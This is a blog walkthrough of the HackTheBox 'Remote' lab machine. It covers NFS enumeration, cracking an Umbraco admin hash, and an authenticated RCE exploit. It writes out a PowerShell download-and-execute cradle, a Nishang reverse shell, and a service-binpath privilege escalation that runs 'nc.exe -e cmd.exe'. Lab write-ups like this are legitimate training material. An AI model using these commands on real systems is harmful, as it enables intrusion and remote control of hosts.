Remote Hackthebox walkthrough

Remote Hackthebox walkthrough

Hey fellas!! Its time for remote from hackthebox. This was an easy Windows machine. The initial foothold for the machine was based on CVE of a CMS and has a straight-forward privilege escalation to Administrator.
With all that said, let’s get started!!

Scan the host for the open ports and services.

# nmap -sC -sV -oA remote.nmap

The output revealed 3 interesting ports 21(ftp), 80(http), 111(rpcbind).
Unfortunately, Anonymous login on ftp did not return anything.
Since nfs was active, I ran another script from nmap for check for any available shares.

# nmap -sV --script=nfs-showmount -oN remote.nfs remote.htb

And I found the share

So I mounted the share on /mnt.

# mount -t nfs /mnt

After a bit of enumeration, I found out a Umbraco.sdf file that is a database file that could lead me to credentials. Also, I googled for Umbraco and found out that it is a content management system.

There was an admin hash encrypted with SHA1.
The hash was decrypted to baconandcheese.

Alongside manual enumeration, I ran a gobuster scan on that yielded a lot of directories.

There were a lot of misleading results, but /install led to something interesting. An Umbraco login page!!

So the email (admin@htb.local) and password (baconandcheese) obtained from Umbraco.sdf can be used here. And kudos, it worked!!

I searched the google for any exploits of Umbraco and found out Authenticated RCE over the version currently used. I found a similar exploit script here.
As a next step, I spawned up a reverse shell and got into the windows box.

Open up a nc listerner on port 4444
Set up python simplehttpserver on port 80
python -m SimpleHTTPServer 80
Copy the nishang script for reverse shell (Invoke-PowerShellTcp.ps1) to you working directory and add a line at the end of the file.

Invoke-PowerShellTcp -Reverse -IPAddress -Port 4444

Run the exploit with following arguments
# python -u admin@htb.local -p baconandcheese -i '' -c powershell.exe -a "IEX(New-Object Net.WebClient).downloadString('')"

And combining all the above points, you are into the box

We can now cd into C:\Users\Public and we get the user.txt

Now time to priv esc!!

I pulled up winPEAS.exe from my local machine to the windows box and enumerated.
Usosvc was running as Administrator. Therefore, the service can be abused into running our own command and hence can get a reverse shell.
I copied a nc.exe onto the windows machine.

> invoke-webrequest -Uri -OutFile nc.exe

Now using sc.exe, the added a reverse shell to the Usosvc service by changing the binpath to the path where nc.exe exists. Also started a netcat listener on a port on the attacking box. After starting the service, the cmdlet got executed with admin privileges and voila we got shell as

> sc.exe config UsoSvc binpath= “C:\Users\Public\nc.exe 4444 -e cmd.exe”
> sc.exe start UsoSvc

From the image above, its inferred that after querying the status of the Usosvc service, we have the command injection on the Binary Path Name that will further lead to privilege escalation upon execution.

Thats all for this post!! Thanks for reading. For more such content subscribe to my page
See you in the next one.Until then, Happy hunting!!


I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as iOS and angular developer. I am also a contributor to CodeVigilant project. My blogs are focused on Infosec and Dev and its how to's.

This Post Has One Comment

  1. Bettye

    I do not even know how I ended up here, but I thought this post was
    great. I don’t know who you are but definitely you are going to a famous blogger if you aren’t already 😉 Cheers!

Leave a Reply